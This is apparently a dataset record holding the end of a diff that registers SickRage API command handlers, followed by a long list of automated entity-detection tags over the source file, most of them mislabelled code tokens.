""history"": CMD_History, + ""history.clear"": CMD_HistoryClear, + ""history.trim"": CMD_HistoryTrim, + ""failed"": CMD_Failed, + ""backlog"": CMD_Backlog, + ""logs"": CMD_Logs, + ""sb"": CMD_SickBeard, + ""postprocess"": CMD_PostProcess, + ""sb.addrootdir"": CMD_SickBeardAddRootDir, + ""sb.checkversion"": CMD_SickBeardCheckVersion, + ""sb.checkscheduler"": CMD_SickBeardCheckScheduler, + ""sb.deleterootdir"": CMD_SickBeardDeleteRootDir, + ""sb.getdefaults"": CMD_SickBeardGetDefaults, + ""sb.getmessages"": CMD_SickBeardGetMessages, + ""sb.getrootdirs"": CMD_SickBeardGetRootDirs, + ""sb.pausebacklog"": CMD_SickBeardPauseBacklog, + ""sb.ping"": CMD_SickBeardPing, + ""sb.restart"": CMD_SickBeardRestart, + ""sb.searchindexers"": CMD_SickBeardSearchIndexers, + ""sb.searchtvdb"": CMD_SickBeardSearchTVDB, + ""sb.searchtvrage"": CMD_SickBeardSearchTVRAGE, + ""sb.setdefaults"": CMD_SickBeardSetDefaults, + ""sb.update"": CMD_SickBeardUpdate, + ""sb.shutdown"": CMD_SickBeardShutdown, + ""show"": CMD_Show, + ""show.addexisting"": CMD_ShowAddExisting, + ""show.addnew"": CMD_ShowAddNew, + ""show.cache"": CMD_ShowCache, + ""show.delete"": CMD_ShowDelete, + ""show.getquality"": CMD_ShowGetQuality, + ""show.getposter"": CMD_ShowGetPoster, + ""show.getbanner"": CMD_ShowGetBanner, + ""show.getnetworklogo"": CMD_ShowGetNetworkLogo, + ""show.getfanart"": CMD_ShowGetFanArt, + ""show.pause"": CMD_ShowPause, + ""show.refresh"": CMD_ShowRefresh, + ""show.seasonlist"": CMD_ShowSeasonList, + ""show.seasons"": CMD_ShowSeasons, + ""show.setquality"": CMD_ShowSetQuality, + ""show.stats"": CMD_ShowStats, + ""show.update"": CMD_ShowUpdate, + ""shows"": CMD_Shows, + ""shows.stats"": CMD_ShowsStats +} +",116822,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['URL', 'http://code.google.com/p/sickbeard/'], ['PERSON', 'Dennis Lutter'], ['PERSON', 'Jonathon Saine'], ['LOCATION', 'http://code.google.com/p/sickbeard/'], ['PERSON', 'TODO'], ['LOCATION', 'sickrage.show'], ['LOCATION', 'sickrage.show'], ['LOCATION', 'sickrage.show'], ['LOCATION', 'sbdatetime'], ['PERSON', 'simplejson'], ['PERSON', 'RESULT_FAILURE'], ['PERSON', 'RESULT_ERROR'], ['PERSON', 'RESULT_FATAL'], ['PERSON', 'RESULT_FAILURE'], ['PERSON', 'RESULT_ERROR'], ['PERSON', 'RESULT_FATAL'], ['LOCATION', 'kwargs.iteritems'], ['PERSON', 'out_dict'], ['PERSON', 'out_dict'], ['PERSON', 'cmd_index = cmd.split'], ['PERSON', 'out_dict'], ['PERSON', 'out_dict = cur_out_dict\n\n '], ['PERSON', 'out_dict = _'], ['PERSON', 'out_dict'], ['NRP', 'kwargs'], ['PERSON', 'cur_args'], ['PERSON', 'cur_args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'old_key'], ['PERSON', 'fullhdtv'], ['PERSON', 'hdwebdl'], ['PERSON', 'root_dir'], ['PERSON', 'CMD_Help(ApiCall'], ['LOCATION', 'self.check_params(args'], ['NRP', 'self.subject'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['DATE_TIME', 'weekday'], ['PERSON', ""coming_episode['weekday""], ['DATE_TIME', 'season'], ['DATE_TIME', 'season'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['DATE_TIME', 'season'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['DATE_TIME', '1900'], ['LOCATION', 'show_obj.airs'], ['DATE_TIME', 'season'], ['DATE_TIME', 'season'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['DATE_TIME', 'season'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['LOCATION', 'isinstance(ep_obj'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'TODO'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', ""msg='Unable""], ['DATE_TIME', 'season'], ['DATE_TIME', 'season'], ['DATE_TIME', 'season'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['DATE_TIME', 'season'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'self.force'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'responds(RESULT_FAILURE'], ['DATE_TIME', 'season'], ['DATE_TIME', ""'season'""], ['PERSON', 'ep.season'], ['DATE_TIME', 'season'], ['DATE_TIME', 'season'], ['DATE_TIME', 'season'], ['PERSON', 'responds(RESULT_FAILURE'], ['DATE_TIME', 'season'], ['DATE_TIME', 'season'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['DATE_TIME', 'season'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['LOCATION', 'isinstance(ep_obj'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', ""msg='Unable""], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', ""msg='Unable""], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['DATE_TIME', 'older than 30 days'], ['DATE_TIME', 'older than 30 days'], ['DATE_TIME', ""older than 30 days'""], ['LOCATION', 'self.check_params(args'], ['DATE_TIME', 'season'], ['LOCATION', 'cur_ep_cat'], ['LOCATION', 'cur_ep_cat'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'Mark'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'hardlink'], ['URL', 'self.is'], ['LOCATION', 'self.check_params(args'], ['URL', 'self.ch'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'msg=""You'], ['PERSON', 'dGet'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['URL', 'new.in'], ['PERSON', 'check_version.updater.get_newest_commit_hash'], ['PERSON', 'backlog_running = sickbeard.searchQueueScheduler.action.is_backlog_in_progress'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'curNewRootDir'], ['PERSON', 'enumerate(root_dirs_new'], ['PERSON', 'curNewRootDir'], ['PERSON', 'COMING_EPS_DISPLAY_PAUSED'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'msg=""Backlog un-'], ['PERSON', 'Ping SickRage'], ['PERSON', 'responds(RESULT_FAILURE'], ['LOCATION', 'msg=""SickRage'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'responds(RESULT_FAILURE'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'hdwebdl'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'hdwebdl'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'hdwebdl'], ['DATE_TIME', '5'], ['DATE_TIME', '6'], ['PERSON', 'COMING_EPS_DISPLAY_PAUSED = int(self.future_show_paused'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'responds(RESULT_FAILURE'], ['LOCATION', 'msg=""SickRage'], ['PERSON', 'responds(RESULT_FAILURE'], ['LOCATION', 'msg=""SickRage'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'CMD_ShowCache'], ['LOCATION', 'genre_list_tmp'], ['LOCATION', 'genre_list_tmp'], ['LOCATION', 'genre_list.append(genre'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'hdwebdl'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'hdwebdl'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'responds(RESULT_FAILURE'], ['LOCATION', 'SR'], ['PERSON', 'hdwebdl'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'hdwebdl'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'hdwebdl'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'hdwebdl'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'responds(RESULT_FAILURE'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'TODO'], ['LOCATION', 'cache_obj.poster_path(show_obj.indexerid'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', ""msg='%s""], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'ShowNetworkLogo(self.indexerid'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'ShowFanArt(self.indexerid'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', ""msg='%s""], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', ""msg='%s""], ['DATE_TIME', 'seasons'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['DATE_TIME', 'seasons'], ['PERSON', 'responds(RESULT_FAILURE'], ['DATE_TIME', 'season'], ['NRP', 'season_list'], ['DATE_TIME', 'season'], ['DATE_TIME', 'season'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['DATE_TIME', 'season'], ['PERSON', 'responds(RESULT_FAILURE'], ['DATE_TIME', 'season'], ['DATE_TIME', '1900'], ['PERSON', 'del row[""season'], ['DATE_TIME', 'seasons'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'del row[""episode'], ['DATE_TIME', '1900'], ['DATE_TIME', 'seasons'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'hdwebdl'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'hdwebdl'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'hdwebdl'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['DATE_TIME', 'season'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['LOCATION', 'sickbeard.showQueueScheduler.action.updateShow(show_obj'], ['PERSON', 'responds(RESULT_FAILURE'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['DATE_TIME', '1900'], ['PERSON', 'CMD_SickBeardDeleteRootDir'], ['URL', 'http://www.gnu.org/licenses/'], ['IP_ADDRESS', ' '], ['IP_ADDRESS', '::'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'sickrage.helper.com'], ['URL', 'sickrage.media.Sh'], ['URL', 'sickrage.media.Sh'], ['URL', 'sickrage.media.Sh'], ['URL', 'sickrage.media.Sh'], ['URL', 'sickrage.show.Com'], ['URL', 'sickrage.sh'], ['URL', 'sickrage.show.Sh'], ['URL', 'sickrage.system.Re'], ['URL', 'sickrage.system.Sh'], ['URL', 'sickbeard.ve'], ['URL', 'sickbeard.com'], ['URL', 'sickbeard.com'], ['URL', 'sickbeard.com'], ['URL', 'sickbeard.com'], ['URL', 'sickbeard.com'], ['URL', 'sickbeard.com'], ['URL', 'sickbeard.com'], ['URL', 'sickbeard.com'], ['URL', 'sickbeard.com'], ['URL', 'sickbeard.com'], ['URL', 'sickbeard.com'], ['URL', 'sickbeard.com'], ['URL', 'sickbeard.com'], ['URL', 'Api.de'], ['URL', 'Api.de'], ['URL', 'self.se'], ['URL', 'self.request.ar'], ['URL', 'kwargs.it'], ['URL', 'self.request.re'], ['URL', 'logger.DE'], ['URL', 'self.ca'], ['URL', 'logger.ER'], ['URL', 'self.fi'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'traceback.fo'], ['URL', 'logger.DE'], ['URL', 'logger.DE'], ['URL', 'logger.DE'], ['URL', 'self.fi'], ['URL', 'logger.DE'], ['URL', 'show.ge'], ['URL', 'show.ge'], ['URL', 'show.ge'], ['URL', 'show.ge'], ['URL', 'mapper.ge'], ['URL', 'show.in'], ['URL', 'show.se'], ['URL', 'show.se'], ['URL', 'show.se'], ['URL', 'asd.in'], ['URL', 'show.se'], ['URL', '2.in'], ['URL', 'show.se'], ['URL', 'kwarg.fi'], ['URL', 'self.ru'], ['URL', 'self.re'], ['URL', 'self.ru'], ['URL', 'self.re'], ['URL', 'self.in'], ['URL', 'ids.in'], ['URL', 'kwargs.ge'], ['URL', 'kwargs.ge'], ['URL', 'logger.ER'], ['URL', 'self.kw'], ['URL', 'self.si'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.ar'], ['URL', 'self.si'], ['URL', 'self.kw'], ['URL', 'self.kw'], ['URL', 'self.kw'], ['URL', 'datetime.date.fr'], ['URL', 'date.st'], ['URL', 'datetime.date.fr'], ['URL', 'date.st'], ['URL', 'datetime.datetime.st'], ['URL', 'date.st'], ['URL', 'Quality.SD'], ['URL', 'Quality.SD'], ['URL', 'sickbeard.RO'], ['URL', 'sickbeard.RO'], ['URL', 'sickbeard.RO'], ['URL', 'sickbeard.RO'], ['URL', 'os.li'], ['URL', 'self.su'], ['URL', 'self.ch'], ['URL', 'mapper.ke'], ['URL', 'self.su'], ['URL', 'mapper.ge'], ['URL', 'self.su'], ['URL', 'self.so'], ['URL', 'self.ch'], ['URL', 'ComingEpisodes.sorts.ke'], ['URL', 'self.ch'], ['URL', 'ComingEpisodes.ca'], ['URL', 'ComingEpisodes.ca'], ['URL', 'self.pa'], ['URL', 'self.ch'], ['URL', 'sickbeard.COM'], ['URL', 'ComingEpisodes.ge'], ['URL', 'self.so'], ['URL', 'self.pa'], ['URL', 'episodes.ke'], ['URL', 'episodes.it'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'db.se'], ['URL', 'self.in'], ['URL', 'helpers.tr'], ['URL', 'sbdatetime.sbdatetime.sb'], ['URL', 'sbdatetime.sbdatetime.co'], ['URL', 'timezones.pa'], ['URL', 'obj.ai'], ['URL', 'obj.net'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'obj.ge'], ['URL', 'queue.Ma'], ['URL', 'sickbeard.searchQueueScheduler.action.ad'], ['URL', 'item.su'], ['URL', 'time.sl'], ['URL', 'item.su'], ['URL', 'obj.st'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.st'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.fo'], ['URL', 'self.ch'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'obj.ge'], ['URL', 'obj.ge'], ['URL', 'ep.se'], ['URL', 'ep.st'], ['URL', 'self.st'], ['URL', 'obj.se'], ['URL', 'obj.se'], ['URL', 'obj.se'], ['URL', 'obj.st'], ['URL', 'self.st'], ['URL', 'sickbeard.US'], ['URL', 'obj.st'], ['URL', 'Quality.DO'], ['URL', 'Quality.AR'], ['URL', 'self.fo'], ['URL', 'obj.st'], ['URL', 'self.st'], ['URL', 'obj.ge'], ['URL', 'self.st'], ['URL', 'db.ma'], ['URL', 'segments.it'], ['URL', 'queue.Ba'], ['URL', 'sickbeard.searchQueueScheduler.action.ad'], ['URL', 'obj.na'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'obj.ge'], ['URL', 'obj.su'], ['URL', 'obj.do'], ['URL', 'obj.su'], ['URL', 'subtitles.na'], ['URL', 'ui.notifications.me'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.in'], ['URL', 'db.se'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'db.se'], ['URL', 'self.in'], ['URL', 'self.li'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.li'], ['URL', 'os.pa'], ['URL', 'os.path.ba'], ['URL', 'self.li'], ['URL', 'self.ch'], ['URL', 'self.li'], ['URL', 'db.se'], ['URL', 'db.se'], ['URL', 'sickbeard.sh'], ['URL', 'db.se'], ['URL', 'shows.pa'], ['URL', 'episodes.sh'], ['URL', 'shows.in'], ['URL', 'curShow.in'], ['URL', 'curShow.ge'], ['URL', 'curShow.in'], ['URL', 'curShow.na'], ['URL', 'curShow.st'], ['URL', 'self.ch'], ['URL', 'logger.re'], ['URL', 'os.path.is'], ['URL', 'f.re'], ['URL', 're.ma'], ['URL', 'match.gr'], ['URL', 'logger.re'], ['URL', 'logger.re'], ['URL', 'x.rs'], ['URL', 'self.pa'], ['URL', 'self.ch'], ['URL', 'self.fo'], ['URL', 'self.ch'], ['URL', 'self.re'], ['URL', 'self.ch'], ['URL', 'self.pro'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.pa'], ['URL', 'sickbeard.TV'], ['URL', 'self.pa'], ['URL', 'self.pa'], ['URL', 'sickbeard.TV'], ['URL', 'processTV.pro'], ['URL', 'self.pa'], ['URL', 'self.pro'], ['URL', 'self.fo'], ['URL', 'self.is'], ['URL', 'self.re'], ['URL', 'self.pa'], ['URL', 'sickbeard.BR'], ['URL', 'self.ve'], ['URL', 'mapper.ke'], ['URL', 'self.ch'], ['URL', 'self.de'], ['URL', 'self.ch'], ['URL', 'os.path.is'], ['URL', 'sickbeard.RO'], ['URL', 'self.de'], ['URL', 'sickbeard.RO'], ['URL', 'sickbeard.RO'], ['URL', 'self.de'], ['URL', 'dirs.in'], ['URL', 'self.de'], ['URL', 'dirs.in'], ['URL', 'sickbeard.RO'], ['URL', 'version.ch'], ['URL', 'version.ge'], ['URL', 'version.updater.ge'], ['URL', 'version.updater.ge'], ['URL', 'version.ge'], ['URL', 'version.updater.ge'], ['URL', 'version.updater.ge'], ['URL', 'version.updater.ge'], ['URL', 'db.se'], ['URL', 'sickbeard.searchQueueScheduler.action.is'], ['URL', 'sickbeard.searchQueueScheduler.action.is'], ['URL', 'sickbeard.backlogSearchScheduler.ne'], ['URL', 'sickbeard.SY'], ['URL', 'self.ch'], ['URL', 'sickbeard.RO'], ['URL', 'sickbeard.RO'], ['URL', 'new.in'], ['URL', 'sickbeard.RO'], ['URL', 'sickbeard.ST'], ['URL', 'sickbeard.COM'], ['URL', 'ui.notifications.ge'], ['URL', 'self.rh.request.re'], ['URL', 'notification.me'], ['URL', 'self.pa'], ['URL', 'self.ch'], ['URL', 'self.pa'], ['URL', 'sickbeard.searchQueueScheduler.action.pa'], ['URL', 'sickbeard.searchQueueScheduler.ac'], ['URL', 'sickbeard.st'], ['URL', 'Restart.re'], ['URL', 'thetvdb.com'], ['URL', 'self.va'], ['URL', 'sickbeard.in'], ['URL', 'self.na'], ['URL', 'self.ch'], ['URL', 'self.la'], ['URL', 'self.ch'], ['URL', 'sickbeard.IN'], ['URL', 'self.va'], ['URL', 'languages.ke'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.va'], ['URL', 'self.la'], ['URL', 'self.na'], ['URL', 'self.in'], ['URL', 'sickbeard.in'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'sickbeard.in'], ['URL', 'params.co'], ['URL', 'self.la'], ['URL', 'self.la'], ['URL', 'sickbeard.IN'], ['URL', 'self.la'], ['URL', 'classes.Al'], ['URL', 'sickbeard.in'], ['URL', 'self.na'], ['URL', 'sickbeard.in'], ['URL', 'sickbeard.in'], ['URL', 'sickbeard.in'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'sickbeard.in'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'sickbeard.in'], ['URL', 'params.co'], ['URL', 'self.la'], ['URL', 'self.la'], ['URL', 'sickbeard.IN'], ['URL', 'self.la'], ['URL', 'sickbeard.in'], ['URL', 'self.in'], ['URL', 'sickbeard.in'], ['URL', 'sickbeard.in'], ['URL', 'sickbeard.in'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'logger.DE'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.ar'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.st'], ['URL', 'self.ch'], ['URL', 'Quality.SD'], ['URL', 'Quality.SD'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.ar'], ['URL', 'self.ar'], ['URL', 'Quality.com'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'sickbeard.ST'], ['URL', 'self.st'], ['URL', 'sickbeard.COM'], ['URL', 'Shutdown.st'], ['URL', 'version.ch'], ['URL', 'version.ru'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'obj.ge'], ['URL', 'obj.ge'], ['URL', 'obj.la'], ['URL', 'obj.na'], ['URL', 'obj.pa'], ['URL', 'obj.su'], ['URL', 'obj.ai'], ['URL', 'obj.an'], ['URL', 'obj.ai'], ['URL', 'obj.sc'], ['URL', 'obj.ar'], ['URL', 'obj.in'], ['URL', 'helpers.ma'], ['URL', 'obj.im'], ['URL', 'obj.net'], ['URL', 'obj.st'], ['URL', 'helpers.tr'], ['URL', 'obj.ne'], ['URL', 'sbdatetime.sbdatetime.co'], ['URL', 'timezones.pa'], ['URL', 'obj.ne'], ['URL', 'sbdatetime.sbdatetime.sb'], ['URL', 'sbdatetime.sbdatetime.sb'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.ar'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.su'], ['URL', 'self.ch'], ['URL', 'sickbeard.US'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'os.path.is'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'Quality.SD'], ['URL', 'Quality.SD'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.ar'], ['URL', 'self.ar'], ['URL', 'Quality.com'], ['URL', 'sickbeard.showQueueScheduler.action.ad'], ['URL', 'self.in'], ['URL', 'sickbeard.ST'], ['URL', 'self.su'], ['URL', 'sickbeard.ST'], ['URL', 'self.ar'], ['URL', 'thetvdb.com'], ['URL', 'self.va'], ['URL', 'sickbeard.in'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.ar'], ['URL', 'self.ch'], ['URL', 'self.ch'], ['URL', 'self.st'], ['URL', 'self.ch'], ['URL', 'self.la'], ['URL', 'self.ch'], ['URL', 'sickbeard.IN'], ['URL', 'self.va'], ['URL', 'languages.ke'], ['URL', 'self.su'], ['URL', 'self.ch'], ['URL', 'sickbeard.US'], ['URL', 'self.an'], ['URL', 'self.ch'], ['URL', 'sickbeard.AN'], ['URL', 'self.sc'], ['URL', 'self.ch'], ['URL', 'sickbeard.SC'], ['URL', 'self.ch'], ['URL', 'self.ar'], ['URL', 'self.ch'], ['URL', 'sickbeard.AR'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'sickbeard.RO'], ['URL', 'sickbeard.RO'], ['URL', 'sickbeard.RO'], ['URL', 'os.path.is'], ['URL', 'Quality.SD'], ['URL', 'Quality.SD'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.ar'], ['URL', 'self.ar'], ['URL', 'Quality.com'], ['URL', 'sickbeard.ST'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'sickbeard.ST'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'os.path.jo'], ['URL', 'sickbeard.AD'], ['URL', 'config.in'], ['URL', 'helpers.ma'], ['URL', 'logger.ER'], ['URL', 'helpers.ch'], ['URL', 'sickbeard.showQueueScheduler.action.ad'], ['URL', 'self.in'], ['URL', 'self.la'], ['URL', 'self.su'], ['URL', 'self.an'], ['URL', 'self.sc'], ['URL', 'self.ar'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'show.ca'], ['URL', 'cache.Im'], ['URL', 'os.path.is'], ['URL', 'obj.in'], ['URL', 'os.path.is'], ['URL', 'obj.ba'], ['URL', 'obj.in'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.re'], ['URL', 'self.ch'], ['URL', 'Show.de'], ['URL', 'self.in'], ['URL', 'self.re'], ['URL', 'show.na'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.in'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.in'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.in'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.in'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.pa'], ['URL', 'self.ch'], ['URL', 'Show.pa'], ['URL', 'self.in'], ['URL', 'self.pa'], ['URL', 'show.na'], ['URL', 'show.pa'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'Show.re'], ['URL', 'self.in'], ['URL', 'show.na'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.so'], ['URL', 'self.ch'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'self.so'], ['URL', 'db.se'], ['URL', 'self.in'], ['URL', 'db.se'], ['URL', 'self.in'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.se'], ['URL', 'self.ch'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], ['URL', 'self.se'], ['URL', 'db.se'], ['URL', 'self.in'], ['URL', 'helpers.tr'], ['URL', 'sbdatetime.sbdatetime.co'], ['URL', 'timezones.pa'], ['URL', 'obj.ai'], ['URL', 'obj.net'], ['URL', 'sbdatetime.sbdatetime.sb'], ['URL', 'db.se'], ['URL', 'self.in'], ['URL', 'self.se'], ['URL', 'helpers.tr'], ['URL', 'sbdatetime.sbdatetime.co'], ['URL', 'timezones.pa'], ['URL', 'obj.ai'], ['URL', 'obj.net'], ['URL', 'sbdatetime.sbdatetime.sb'], ['URL', 'thetvdb.com'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.ar'], ['URL', 'self.ch'], ['URL', 'self.in'], ['URL', 'self.ch'], ['URL', 'self.ar'], ['URL', 'self.ch'], ['URL', 'Show.fi'], ['URL', 'sickbeard.sh'], ['URL', 'self.in'], 